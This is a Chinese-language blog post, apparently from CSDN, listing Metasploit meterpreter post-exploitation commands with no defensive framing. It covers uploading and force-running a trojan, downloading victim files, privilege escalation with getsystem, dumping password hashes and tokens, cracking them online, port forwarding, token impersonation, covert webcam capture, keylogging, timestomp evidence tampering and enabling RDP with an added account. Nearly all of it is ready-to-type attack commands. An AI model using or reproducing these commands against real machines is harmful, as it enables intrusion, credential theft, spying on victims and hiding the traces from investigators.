meterpreter后期攻击使用方法

meterpreter后期攻击使用方法

制作木马pcshare,远控软件,网上寻找软件上传到目标主机

1、上传文件到Windows主机

  简单来说,就是你可以上传本机的任意文件到远程目标主机中。

meterpreter >   upload <file> <destination>
meterpreter >   upload //root//123.exe  c://123.exe

注意:使用-r可以递归上传目录和文件

2、在目标主机上强行执行EXE文件

meterpreter >   execute -f <path> [options]
meterpreter >   execute -f c://"Documents and Settings"//Owner//Desktop//123.exe   #带空格的路径
meterpreter >   execute -f c://123.exe

3、从对方主机上下载文件

meterpreter >   download <file> <path to save>
meterpreter >   download c://111.txt

4、执行cmd

meterpreter >   execute -f cmd -c 或  shell

5、查看对方进程

meterpreter >  ps

6、获取对方管理员权限

meterpreter >   get 
meterpreter >   getsystem

7、使用hashdump转储所有hash值

获取管理员的用户密码哈希值
ntlm在线破解: https://hashkiller.co.uk/ntlm-decrypter.aspx

8、彩虹表工具kali–ophcrack hashcat

9、使用credcollect转储hash值

还有一个类似的脚本叫credential_collector,也可以收集目标主机的tokens

meterpreter >   run credcollect

10、创建端口转发

meterpreter shell中的portfwd命令是转发技术中最常用的一个命令,可以让攻击系统访问本来无法直接访问的目标主机
add 选项会将端口转发添加到列表中,而且本质上会创建一个隧道。
note: 这个隧道存在于meterpreter控制台之外,如何终端会话都可以使用。

meterpreter >portfwd add -l 6666 -p 3389 -r 127.0.0.1

将目标机的3389端口转发到本地6666端口

11、查看用户ID

meterpreter >getuid
meterpreter >sysinfo

15、模拟任意用户(token操作)

只需要输入use incognito命令即可
输入list_tokens -u来显示所有有效的tokens
然后我们需要模拟某个token来获取其权限,如果成功模拟一个token,可以使用getuid检查当前用户ID

meterpreter >use incognito
meterpreter >list_tokens -u
meterpreter >impersonate_token "你想切换的账号"

16、webcam摄像头命令

meterpreter >webcam_list  #查看摄像头
meterpreter >webcam_snap  #通过摄像头拍照
meterpreter >webcam_stream  #通过摄像头开启视频

17、timestomp伪造时间戳

meterpreter >timestomp c:// -h  #查看帮助
meterpreter >timestomp -v c://2.txt  #查看时间戳
meterpreter >timestomp c://2.txt -f c://1.txt #将1.txt的时间戳复制给2.txt

18、enable_rdp脚本开启3389

meterpreter >run post/windows/manage/enable_rdp #开启远程桌面
meterpreter >run post/windows/manage/enable_rdp USERNAME=WWW2 PASSWORD=123456 #添加用户
meterpreter >run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将对方3389转发到对方6662

19、键盘记录

meterpreter >keyscan_start  #开启键盘记录
meterpreter >keyscan_dump   #导出键盘记录
meterpreter >keyscan_stop   #结束键盘记录
已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页